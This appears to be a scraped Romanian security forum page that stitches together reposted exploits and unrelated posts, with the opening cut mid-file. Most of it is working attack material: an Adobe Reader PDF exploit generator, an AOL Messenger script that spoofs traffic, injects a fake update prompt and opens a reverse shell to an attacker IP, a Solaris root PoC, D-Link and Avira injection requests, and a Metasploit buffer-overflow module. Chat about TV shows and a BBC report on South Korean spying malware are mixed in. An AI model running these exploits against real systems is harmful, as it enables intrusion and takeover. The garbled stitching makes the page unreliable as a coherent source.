</monthNames> <monthNames abbr="1"> <month>Jan</month> <month>Feb</month> <month>Mar</month> <month>Apr</month> <month>May</month> <month>Jun</month> <month>Jul</month> <month>Aug</month> <month>Sep</month> <month>Oct</month> <month>Nov</month> <month>Dec</month> </monthNames> <dayNames> <day>Sunday</day> <day>Monday</day> <day>Tuesday</day> <day>Wednesday</day> <day>Thursday</day> <day>Friday</day> <day>Saturday</day> </dayNames> <dayNames abbr="1"> <day>Sun</day> <day>Mon</day> <day>Tue</day> <day>Wed</day> <day>Thu</day> <day>Fri</day> <day>Sat</day> </dayNames> <meridiemNames> <meridiem>AM</meridiem> <meridiem>PM</meridiem> </meridiemNames> <eraNames> <era>BC</era> <era>AD</era> </eraNames> </calendarSymbols> <datePatterns> <datePattern name="full">EEEE, MMMM D, YYYY</datePattern> <datePattern name="long">MMMM D, YYYY</datePattern> <datePattern name="med">MMM D, YYYY</datePattern> <datePattern name="short">M/D/YY</datePattern> </datePatterns> <timePatterns> <timePattern name="full">h:MM:SS A Z</timePattern> <timePattern name="long">h:MM:SS A Z</timePattern> <timePattern name="med">h:MM:SS A</timePattern> <timePattern name="short">h:MM A</timePattern> </timePatterns> <dateTimeSymbols>GyMdkHmsSEDFwWahKzZ</dateTimeSymbols> <numberPatterns> <numberPattern name="numeric">z,zz9.zzz</numberPattern> <numberPattern name="currency">$z,zz9.99|($z,zz9.99)</numberPattern> <numberPattern name="percent">z,zz9%</numberPattern> </numberPatterns> <numberSymbols> <numberSymbol name="decimal">.</numberSymbol> <numberSymbol name="grouping">,</numberSymbol> <numberSymbol name="percent">%</numberSymbol> <numberSymbol name="minus">-</numberSymbol> <numberSymbol name="zero">0</numberSymbol> </numberSymbols> <currencySymbols> <currencySymbol name="symbol">$</currencySymbol> <currencySymbol name="isoname">USD</currencySymbol> <currencySymbol name="decimal">.</currencySymbol> </currencySymbols> <typefaces> <typeface name="Myriad Pro"/> <typeface name="Minion Pro"/> <typeface name="Courier Std"/> <typeface name="Adobe Pi Std"/> <typeface name="Adobe Hebrew"/> <typeface name="Adobe Arabic"/> <typeface name="Adobe Thai"/> <typeface name="Kozuka Gothic Pro-VI M"/> <typeface name="Kozuka Mincho Pro-VI R"/> <typeface name="Adobe Ming Std L"/> <typeface name="Adobe Song Std L"/> <typeface name="Adobe Myungjo Std M"/> </typefaces> </locale> <?originalXFAVersion http://www.xfa.org/schema/xfa-locale-set/2.1/?></localeSet> <xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/"> <xfa:data xfa:dataNode="dataGroup"/> </xfa:datasets> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.2-c001 63.139439, 2011/06/07-10:39:26 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description xmlns:xmp="http://ns.adobe.com/xap/1.0/" rdf:about=""> <xmp:MetadataDate>2012-11-23T13:41:54Z</xmp:MetadataDate> <xmp:CreatorTool>Adobe LiveCycle Designer ES 10.0</xmp:CreatorTool> <xmp:ModifyDate>2012-11-23T05:26:02-08:00</xmp:ModifyDate> <xmp:CreateDate>2012-11-23T05:15:47-08:00</xmp:CreateDate> </rdf:Description> <rdf:Description xmlns:pdf="http://ns.adobe.com/pdf/1.3/" rdf:about=""> <pdf:Producer>Adobe LiveCycle Designer ES 10.0</pdf:Producer> </rdf:Description> <rdf:Description xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" rdf:about=""> <xmpMM:DocumentID>uuid:0aa46f9b-2c50-42d4-ab0b-1a1015321da7</xmpMM:DocumentID> <xmpMM:InstanceID>uuid:86c66599-7238-4e9f-8fad-fe2cd922afb2</xmpMM:InstanceID> </rdf:Description> <rdf:Description xmlns:dc="http://purl.org/dc/elements/1.1/" rdf:about=""> <dc:format>application/pdf</dc:format> </rdf:Description> </rdf:RDF> </x:xmpmeta> <xfdf xmlns="http://ns.adobe.com/xfdf/" xml:space="preserve"> <annots/> </xfdf></xdp:xdp> ''' assert len(shellcode) <= 0xF00, "You need a smaller shellcode, sorry" #shellcode xdp = xdp.replace("%%SHELLCODE%%",UEncode(shellcode)) xdp = xdp.replace("%%SLIDESIZE%%", "0x%x"%SLIDESIZE); xdp = xdp.replace("%%MINICHUNKX%%",UEncode('O'*SLIDESIZE)) xdp = xdp.replace("%%BMPFREELFH%%",mkBMP('\x01\x00\x00\x00\x00\x00'+ chr(0x27)+'\x05',True).encode('base64')) #xdp = xdp.replace("%%BMPFREELFH%%",file("/usr/share/pixmaps/gnome-news.png","rb").read().encode('base64')) file("%s.log"%sys.argv[0].split('.')[0],'wb').write(xdp) #The document doc = PDFDoc() #font font = PDFDict() font.add("Name", PDFName("F1")) font.add("Subtype", PDFName("Type1")) font.add("BaseFont", PDFName("Helvetica")) #name:font map fontname = PDFDict() fontname.add("F1",font) #resources resources = PDFDict() resources.add("Font",fontname) #contents contentsDict = PDFDict() contents= PDFStream(contentsDict, '''BT /F1 24 Tf 100 100 Td (Pedefe Pedefeito Pedefeon!) Tj ET''') #page page = PDFDict() page.add("Type",PDFName("Page")) page.add("Resources",resources) page.add("Contents", PDFRef(contents)) #pages pages = PDFDict() pages.add("Type", PDFName("Pages")) pages.add("Kids", PDFArray([PDFRef(page)])) pages.add("Count", PDFNum(1)) #add parent reference in page page.add("Parent",PDFRef(pages)) xfa = PDFStream(PDFDict(), xdp) xfa.appendFilter(FlateDecode()) doc.add(xfa) #form form = PDFDict() form.add("XFA", PDFRef(xfa)) doc.add(form) #shellcode2 shellcode2 = PDFStream(PDFDict(), struct.pack("<L",0xcac0face)+"\xcc"*10) doc.add(shellcode2) #catalog catalog = PDFDict() catalog.add("Type", PDFName("Catalog")) catalog.add("Pages", PDFRef(pages)) catalog.add("NeedsRendering", "true") catalog.add("AcroForm", PDFRef(form)) adbe = PDFDict() adbe.add("BaseVersion","/1.7") adbe.add("ExtensionLevel",PDFNum(3)) extensions = PDFDict() extensions.add("ADBE", adbe) catalog.add("Extensions",extensions) doc.add([catalog,pages,page,contents]) doc.setRoot(catalog) #render it return doc.__str__() if __name__ == '__main__': import optparse,os from subprocess import Popen, PIPE parser = optparse.OptionParser(description='Adobe Reader X 10.1.4 XFA BMP RLE Exploit') parser.add_option('--debug', action='store_true', default=False, help='For debugging') parser.add_option('--msfpayload', metavar='MSFPAYLOAD', default="windows/messagebox ", help="Metasploit payload. Ex. 'win32_exec CMD=calc'") parser.add_option('--payload', metavar='PAYLOAD', default=None) parser.add_option('--doc', action='store_true', default=False, help='Print detailed documentation') (options, args) = parser.parse_args() if options.doc: print __doc__ os.exit(-1) if options.debug: print mkXFAPDF(), os.exit(-1) if options.payload == None: #"windows/meterpreter/reverse_tcp LHOST=192.168.56.1 EXITFUNC=process R" msfpayload = Popen("msfpayload4.4 %s R"%options.msfpayload, shell=True, stdout=PIPE) shellcode = msfpayload.communicate()[0] else: shellcode = file(options.payload, "rb").read() #options.hexpayload.decode('hex') print mkXFAPDF(shellcode),

Description : AOL Instant Messenger versions 8.0.1.5 and below suffer from a binary file planting vulnerability. Author : Marshall Whittaker Source : AOL Instant Messenger 8.0.1.5 Binary Planting ? Packet Storm Code : #!/bin/bash ### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working. ### Leverages binary file planting to My Documents via AIMs advertisement code. ### Little social engineering built in using javascript to try to get them to run the AIM_Install.exe. ### Starts a reverse shell back to your handler on 192.168.2.5:443 by default. ### Marshall Whittaker ATTACKER="192.168.2.10"; VICTIM="192.168.2.5"; GATEWAY="192.168.2.1"; REVPORT="443"; PAYLOADSITE="https://dl.dropboxusercontent.com/s/dykenlhdobchjjv/AIM_Install.exe?token_hash=AAE2qGWSZAlAWJKepUu_2fP5UZfg-JTHktBGuu-I4BV34Q&dl=1"; mkdir ~/aimpwn; echo "if (tcp.src == 80) {" > ~/aimpwn/aimpwn.filter; echo "if (search(DATA.data, \"atwola\")) {" >> ~/aimpwn/aimpwn.filter; echo "replace(\"_blank>\", \"_blank><script>alert('A new version of AOL Instant Messenger is available!');window.location = '$PAYLOADSITE'; setTimeout(function(){alert ('Navigate to your My Documents folder and start the installer by clicking AIM_Install and follow the steps.');}, 1000);</script>\");" >> ~/aimpwn/aimpwn.filter; echo "msg(\"PWNT.\n\");" >> ~/aimpwn/aimpwn.filter; echo "}" >> ~/aimpwn/aimpwn.filter; echo "}" >> ~/aimpwn/aimpwn.filter; etterfilter ~/aimpwn/aimpwn.filter -o ~/aimpwn/aimpwn.ef; ### wget section. #wget http://download.newaol.com/aim/win/AIM_Install.exe -O ~/aimpwn/AIM_Install.exe; cp ~/aimpwn/AIM_Install.exe /opt/metasploit/apps/pro/msf3/data/templates/; msfpayload windows/shell/reverse_tcp LHOST=$ATTACKER LPORT=$REVPORT R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -x AIM_Install.exe -t exe -e x86/call4_dword_xor -c 2 -o ~/aimpwn/AIM_Install.exe; ### Uncomment wget section and put code to upload AIM_Install.exe to a site if you need to ### change ATTACKER IP or port. ettercap -T -F ~/aimpwn/aimpwn.ef -q -M arp:remote /$GATEWAY/ /$VICTIM/ & msfcli exploit/multi/handler payload=windows/shell/reverse_tcp lhost=$ATTACKER lport=$REVPORT E;

Description : Avira Analysis Web Service suffers from a remote SQL injection vulnerability. Author : Ebrahim Hegazy Source : Avira Analysis Web Service SQL Injection ? Packet Storm Code : Title: ====== Avira Analysis Web Service - SQL Injection Vulnerability Date: ===== 2013-07-08 References: =========== http://www.vulnerability-lab.com/get_content.php?id=997 VL-ID: ===== 997 Common Vulnerability Scoring System: ==================================== 8.5 Abstract: ========= The Vulnerability Laboratory Core Research Team discovered a critical SQL Injection vulnerability in the Avira Analysis online service application. Report-Timeline: ================ 2013-05-25: Vendor Notification 2013-05-26: Vendor Response/Feedback 2013-06-31: Vendor Fix/Patch 2013-07-08: Public Disclosure Status: ======== Published Affected Products: ================== Avira Product: Analysis - Web Application & Online Service 2013 Q2 Exploitation-Technique: ======================= Remote Severity: ========= Critical Details: ======== A remote SQL Injection web vulnerability is detected in ? the official Avira Analysis online service application. The vulnerability allows remote attackers to inject own sql commands to compromise the affected application dbms. The SQL Injection vulnerability is located in the `overview` file when processing to request manipulated `uniqueid` parameter. By manipulation of the `uniqueid` parameter the attackers can inject own sql commands to compromise the webserver application dbms. When processing to bypass the filter validation by trying to use a single qoute or a double qoute to check if the parameter is vulnerable or not, attackers will be redirected to another page, but when the attacker is processing to request with a back-slash the context will be executed and new mysql errors will become visible for exploitation. The vulnerability can be exploited by remote attackers without privileged application user account and without required user interaction. Successful exploitation of the sql injection vulnerability results in web application and online service dbms compromise. Vulnerable Module(s): [+] en Vulnerable File(s): [+] overview Vulnerable Module(s): [+] uniqueid Proof of Concept: ================= The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account and without required user interaction. For demonstration or reproduce ... Vulnerable Service Domain: analysis.avira.com Vulnerable Module: en Vulnerable File: overview Vulnerable Parameter: uniqueid Note: When trying to use a single qoute or a double qoute to check if the parameter is vulnerable or not, you will be redirected to another page, but when processing to load with a back-slash new mysql errors will become visible for exploitation. POC: https://analysis.avira.com/en/overview?start=0&uniqueid=1YcGIXI0qbPbpTHg7YvFEr8MG7JmkbSg\[SQL INJECTION VULNERABILITY!] PoC Video: http://www.youtube.com/watch?v=Odko5PTKA-Q Reference(s): https://analysis.avira.com/ Solution: ========= The vulnerability can be patched by a restriction and secure parse of the uniqueid parameter request. Risk: ===== The security risk of the remote sql injection web vulnerability is estimated as critical. Credits: ======== Vulnerability Laboratory [Research Team] - Ebrahim Hegazy [Zigoo] (ebrahim@evolution-sec.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com

Description : Solaris Recommended Patch Cluster 6/19 suffers from a local root command execution vulnerability on x86. Author : Larry W. Cashdollar Source : Solaris Recommended Patch Cluster 6/19 Local Root ? Packet Storm Code : Solaris Recommended Patch Cluster 6/19 local root on x86 Larry W. Cashdollar 7/3/2013 @_larry0 If the system administrator is updating the system using update manager or smpatch (multi user mode) a local user could execute commands as root. This only affects x86 systems as this code resides under a case statement checking that the platform is intel based. Local root: Write to /tmp/diskette_rc.d/rcs9.sh before execution and you can execute commands as root. ./144751-01/SUNWos86r/install/postinstall 782 if [ -s /tmp/disketterc.d/rcs9.sh ] 783 then 784 /sbin/sh /tmp/disketterc.d/rcs9.sh "post" 785 fi Inject entries into driver_aliases, research config file? maybe we can load our own library/driver? 804 # Remove erroneous entry for Symbios Logic 53c875/95 (ncrs) 805 TMPFILE=/tmp/ncrstmp 806 sed -e '/^ncrs "pci1000,1000"$/d' ${BASEDIR}/etc/driveraliases >$TMPFIL E 807 cp $TMPFILE ${BASEDIR}/etc/driver_aliases ./141445-09/SUNWos86r/install/postinstall 656 if [ -s /tmp/disketterc.d/rcs9.sh ] 657 then 658 /sbin/sh /tmp/disketterc.d/rcs9.sh "post" 659 fi Well, it looks like you've got a few chances to abuse it: larry@slowaris:~/10x86Recommended/patches$ find . -name "*install" -type f -exec grep -l "/sbin/sh /tmp/diskette_rc.d/rcs9.sh" {} \; ./144501-19/SUNWos86r/install/postinstall ./141445-09/SUNWos86r/install/postinstall ./142059-01/SUNWos86r/install/postinstall ./147148-26/SUNWos86r/install/postinstall ./127128-11/SUNWos86r/install/postinstall ./148889-03/SUNWos86r/install/postinstall ./142910-17/SUNWos86r/install/postinstall ./144751-01/SUNWos86r/install/postinstall Psuedo PoC: Depending on how rcs9.sh is created, we can either write to it repeatedly or just create the file initially with our malicious entry. chmod 666 /etc/shadow would be easy. PoC: larry@slowaris:~$ cat setuid.c #include #include int main (void) { char *shell[2]; shell[0] = "sh"; shell[1] = NULL; setregid (0, 0); setreuid (0, 0); execve ("/bin/sh", shell, NULL); return(0); } gcc -o /tmp/r00t setuid.c larry@slowaris:~$ cat /tmp/diskette_rc.d/rcs9.sh chown root:root /tmp/r00t chmod +s /tmp/r00t After patches have been applied: larry@slowaris:~$ /tmp/r00t # id uid=0(root) gid=0(root)

Description : D-Link devices DIR-300 rev B, DIR-600 rev B, DIR-645, DIR-845, and DIR-865 suffer from a remote command injection vulnerability. The vulnerability is caused due to missing input validation in different XML parameters. Author : Michael Messner Source : D-Link UPnP OS Command Injection ? Packet Storm Code : Vendor: D-Link Devices: DIR-300 rev B / DIR-600 rev B / DIR-645 / DIR-845 / DIR-865 ============ Vulnerable Firmware Releases: ============ DIR-300 rev B - 2.14b01 DIR-600 - 2.16b01 DIR-645 - 1.04b01 DIR-845 - 1.01b02 DIR-865 - 1.05b03 Other devices and firmware versions may be also vulnerable. ============ Vulnerability Overview: ============ * Unauthenticated OS Command Injection The vulnerability is caused by missing input validation in different XML parameters. This vulnerability could be exploited to inject and execute arbitrary shell commands. WARNING: You do not need to be authenticated to the device to insert and execute malicious commands. Hint: On different devices wget is preinstalled and you are able to upload and execute your malicious binary. => Parameter: NewInternalClient, NewInternalClient, NewInternalPort Example Request: POST /soap.cgi?service=WANIPConn1 HTTP/1.1 SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping" Host: 10.8.28.133:49152 Content-Type: text/xml Content-Length: 649 <?xml version="1.0"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"> <NewPortMappingDescription></NewPortMappingDescription> <NewLeaseDuration></NewLeaseDuration> <NewInternalClient>`COMMAND`</NewInternalClient> <NewEnabled>1</NewEnabled> <NewExternalPort>634</NewExternalPort> <NewRemoteHost></NewRemoteHost> <NewProtocol>TCP</NewProtocol> <NewInternalPort>45</NewInternalPort> </m:AddPortMapping> </SOAP-ENV:Body> </SOAP-ENV:Envelope> You could use miranda for your own testing: * NewInternalClient Required argument: Argument Name: NewInternalClient Data Type: string Allowed Values: [] Set NewInternalClient value to: `ping 192.168.0.100` * NewExternalPort Required argument: Argument Name: NewExternalPort Data Type: ui2 Allowed Values: [] Set NewExternalPort value to: `ping 192.168.0.100` * NewInternalPort Required argument: Argument Name: NewInternalPort Data Type: ui2 Allowed Values: [] Set NewInternalPort value to: `ping 192.168.0.100` Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/dir-865-v105-shell.png ============ Solution ============ DIR-300 rev B - disable UPnP DIR-600 - update to v2.17b01 DIR-645 - update to v1.04b11 DIR-845 - update to v1.02b03 DIR-865 - disable UPnP ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de/advisories Twitter: @s3cur1ty_de ============ Time Line: ============ 06.06.2013 - discovered vulnerability 07.06.2013 - reported vulnerability to vendor => some fixes are available but there is no communication with the vendor 06.07.2013 - public disclosure at Sigint 2013 06.07.2013 - public disclosure of advirsory ===================== Advisory end =====================

Description : This Metasploit module exploits a buffer overflow vulnerability found in ERS Viewer 2013. The vulnerability exists in the module ermapper_u.dll, where the function rf_report_error handles user provided data in a insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This Metasploit module has been tested successfully with ERS Viewer 2013 (versions 13.0.0.1151) on Windows XP SP3 and Windows 7 SP1. Author : James Fitts, juan vazquez Source : ERS Viewer 2013 ERS File Handling Buffer Overflow ? Packet Storm Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Egghunter def initialize(info={}) super(update_info(info, 'Name' => "ERS Viewer 2013 ERS File Handling Buffer Overflow", 'Description' => %q{ This module exploits a buffer overflow vulnerability found in ERS Viewer 2013. The vulnerability exists in the module ermapper_u.dll, where the function rf_report_error handles user provided data in a insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2013 (versions 13.0.0.1151) on Windows XP SP3 and Windows 7 SP1. }, 'License' => MSF_LICENSE, 'Author' => [ 'James Fitts', # Vulnerability Discovery 'juan vazquez' # Metasploit ], 'References' => [ [ 'CVE', '2013-3482' ], [ 'OSVDB', '93650' ], [ 'URL', 'http://secunia.com/advisories/53620/' ] ], 'Payload' => { 'Space' => 4000, 'DisableNops' => true, }, 'DefaultOptions' => { 'ExitFunction' => "process", }, 'Platform' => 'win', 'Targets' => [ # Tested on Windows XP SP3 [ 'ERS Viewer 2013 13.0.0.1151 / NO DEP / NO ASLR', { 'Offset' => 191, 'Ret' => 0x100329E9 # jmp eax # from ermapper_u.dll } ], # Tested on Windows XP SP3 and Windows 7 SP1 [ 'ERS Viewer 2013 13.0.0.1151 / DEP & ASLR bypass', { 'Offset' => 191, 'Ret' => 0x100E1152, # xchg eax, esp # ret # from ermapper_u.dll 'RetNull' => 0x30d07f00, # ret ending with null byte # from ethrlib.dll 'VirtualAllocPtr' => 0x1010c0f4 } ] ], 'Privileged' => false, 'DisclosureDate' => "May 23 2013", 'DefaultTarget' => 1)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.ers']), ], self.class) end def create_rop_chain() # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ 0x10082624, # POP EAX # RETN [ermapper_u.dll] 0x1010c0f4, # ptr to &VirtualAlloc() [IAT ermapper_u.dll] 0x1001a9c0, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ermapper_u.dll] 0x1005db36, # XCHG EAX,ESI # RETN [ermapper_u.dll] 0x10105d87, # POP EBX # RETN [ermapper_u.dll] 0xffffffff, # 0x30d059d9, # INC EBX # RETN [ethrlib.dll] 0x30d059d9, # INC EBX # RETN [ethrlib.dll] 0x100e9dd9, # POP EAX # RETN [ermapper_u.dll] 0xa2dbcf75, # put delta into eax (-> put 0x00001000 into edx) 0x1001aa04, # ADD EAX,5D24408B # RETN [ermapper_u.dll] 0x10016a98, # XCHG EAX,EDX # OR EAX,4C48300 # POP EDI # POP EBP # RETN [ermapper_u.dll] 0x10086d21, # RETN (ROP NOP) [ermapper_u.dll] 0x1001a148, # & push esp # ret [ermapper_u.dll] 0x10082624, # POP EAX # RETN [ermapper_u.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x100f687d, # NEG EAX # RETN [ermapper_u.dll] 0x1001e720, # XCHG EAX,ECX # ADC EAX,5DE58B10 # RETN [ermapper_u.dll] 0x100288b5, # POP EAX # RETN [ermapper_u.dll] 0x90909090, # nop 0x100e69e0, # PUSHAD # RETN [ermapper_u.dll] ].flatten.pack("V*") return rop_gadgets end # Restore the stack pointer in order to execute the final payload successfully def fix_stack pivot = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18] # get teb pivot << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit pivot << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset return pivot end # In the Windows 7 case, in order to bypass ASLR/DEP successfully, after finding # the payload on memory we can't jump there directly, but allocate executable memory # and jump there. Badchars: "\x0a\x0d\x00" def hunter_suffix(payload_length) # push flProtect (0x40) suffix = "\xB8\xC0\xFF\xFF\xFF" # mov eax, 0xffffffc0 suffix << "\xF7\xD8" # neg eax suffix << "\x50" # push eax # push flAllocationType (0x3000) suffix << "\x66\x05\xC0\x2F" # add ax, 0x2fc0 suffix << "\x50" # push eax # push dwSize (0x1000) suffix << "\x66\x2D\xFF\x1F" # sub ax, 0x1fff suffix << "\x48" # dec eax suffix << "\x50" # push eax # push lpAddress suffix << "\xB8\x0C\x0C\x0C\x0C" # mov eax, 0x0c0c0c0c suffix << "\x50" # push eax # Call VirtualAlloc suffix << "\xFF\x15" + [target['VirtualAllocPtr']].pack("V") # call ds:VirtualAlloc # Copy payload (edi) to Allocated memory (eax) suffix << "\x89\xFE" # mov esi, edi suffix << "\x89\xC7" # mov edi, eax suffix << "\x31\xC9" # xor ecx, ecx suffix << "\x66\x81\xC1" + [payload_length].pack("v") # add cx, payload_length suffix << "\xF3\xA4" # rep movsb # Jmp to the final payload (eax) suffix << "\xFF\xE0" # jmp eax return suffix end def exploit #These badchars do not apply to the final payload badchars = [0x0c, 0x0d, 0x0a].pack("C*") eggoptions = { :checksum => true, :eggtag => 'w00t' } my_payload = fix_stack + payload.encoded if target.name =~ /DEP & ASLR bypass/ # The payload length can't include NULL's in order to # build the stub which will copy the final payload to # executable memory while [my_payload.length].pack("v").include?("\x00") my_payload << rand_text(1) end end hunter,egg = generate_egghunter(my_payload, badchars, eggoptions) if target.name =~ /DEP & ASLR bypass/ hunter.gsub!(/\xff\xe7/, hunter_suffix(my_payload.length)) end if target.name =~ /NO DEP/ buf = rand_text_alpha(1) buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected buf << "AA" # EAX pointing to buf[5] prefixed with 0x00 after ret buf << hunter buf << rand_text_alpha(target['Offset'] - buf.length) buf << [target.ret].pack("V") # jmp eax buf << rand_text_alpha(8) buf << egg elsif target.name =~ /DEP & ASLR bypass/ buf = rand_text_alpha(1) buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected buf << [target['RetNull']].pack("V")[1,3] # EAX pointing to buf[5] prefixed with 0x00 after ret buf << create_rop_chain buf << hunter buf << rand_text_alpha(target['Offset'] - buf.length) buf << [target.ret].pack("V") # xchg eax, esp # ret buf << rand_text_alpha(8) buf << egg end ers = %Q| DatasetHeader Begin #{buf} End | file_create(ers) end end

Nu ii mai raspundeti la post-uri , dati-i direct report toti.Este vreun ratat care are chef de caterinca si si-a facut inca un cont pentru a ne face pe noi sa trollam.

Pot spune ca Hannibal m-a cucerit exact de la primul episod.Este asa de linistitor , rece , exact pe placul meu.Poti urmari cu atentie toate evenimentele care se petrec , nu sunt foarte multe personaje.Curios insa este cum s-a terminat serialul ... oare va iesi Will de la puscarie si va reveni la FBI? @Dexter : Dupa cum ati vazut a reinceput si pe mine Vogel m-a fascinat.Este ceva suspect la ea totusi... cel putin dupa episodul doi a lasat o impresie de hoata. @ Filme : Am vazut G.I. Joe Retailation : Parerea mea lasata de acest film este ca totul este o regie foarte bine pusa la punct de catre U.S.A si anume de a trimite un mesaj foarte clar celorlalte puteri nucleare cum ca daca nu se vor supune cerintelor si regulilor impuse de catre ei vor avea probleme. Am mai vazut acum si 42 : Un film care ii are in atentie pe Harrison Ford si un jucator baseball de culoare.Aici e o lupta cu rasismul care era pe vremuri la americani .. bineinteles pana la urma toate vor fi bune si frumoase. ( Film inspirat din fapte reale ; la sfarsit sunt si poze cu cei care au existat si in realitate)

What the fuck ?

Hackers who wiped tens of thousands of PC hard drives in South Korea earlier this year also appear to be targeting the country's military secrets, according to a report. McAfee said it found malware designed to copy sensitive data held by the South Korean military A study by McAfee Labs said the group has created malware which scanned systems for keywords including "weapon", "US Army" and "secret". It said that once a computer's contents had been catalogued, the attackers could "grab documents at will". South Korea has played down the threat. Its defence ministry told the Associated Press news agency that it was technically impossible to have lost classified reports because the computers on which it stored military secrets were not connected to the net. A spokesman for the Pentagon said it planned to review the report. Social network McAfee said the attacks were part of a long-term spying operation dating back to at least 2009 which it called Operation Troy because the name of the ancient city repeatedly appeared in the hackers' code. It began investigating the group following an attack in March which caused data held on PCs used by several banks and TV networks to be deleted. Although the security firm said that the malware used to wipe the disks was distinct from that used to hunt for the military secrets, it said there were so many similarities between the two that it believed they must be created by the same team. It traced the spying effort back to at least 2009 when it said the hackers managed to place an exploit on a military social networking site. It added that it believed the code was also spread through the use of "spear phishing" - email or other messages masquerading as official communications which were designed to fool specific individuals into handing over logins and other sensitive information. TV network KBS was among the organisations targeted by the 20 March cyber-attack The report said that once the malware was in place it searched the infected systems for "interesting" documents. To do this it scanned for a variety of Korean and English-language keywords. The study lists dozens of examples including "tactics", "brigade", "logistics" and "Operation Key Resolve" - a military exercise involving both South Korean and US forces carried out every year. McAfee said it had opted to withhold other "sensitive" terms at the request of US officials. The report explained the software then flagged which computers appeared to have the most valuable contents and uploaded copies of their directories to the attackers' servers. It said the hackers were then able to pick and choose which files to download in order to keep network traffic to a minimum, helping them avoid detection. McAfee also warned that it had discovered a version of the spying malware which had the ability to destroy data in a way similar to the one used against the civilian targets. "This capability could be devastating if military networks were to suddenly be wiped after an adversary had gathered intelligence," it said. "There was at least one limitation, however. We found the malware of February 2011 could wipe its targets only if it was detected that it was being debugged or analysed by a security product." Wiper function A spokesman for South Korea's government denied classified documents would have been at risk since the computer network that stored them was not connected to the net. McAfee said the malware contained code designed to hunt out military-related terms "It's physically separated," said Kim Min-Seok. However, one of the report's authors suggested there was still a risk. "It is not entirely impossible to extract information from a closed network that is disconnected from the internet," said senior threat researcher Ryan Sherstobitoff. "[but] it would require some extensive planning and understanding of the internal layout to stage such an exfiltration [unauthorised data transfer] to the external world." The report does not name who McAfee believes to be responsible, however South Korean officials have previously said that the 20 March attack "resembled North Korea's past hacking patterns". SursaBBC.co.uk

Extraterestrii pe forum de securitate.

3 ore download pentru fiecare video. Mai bine faceai un torrent.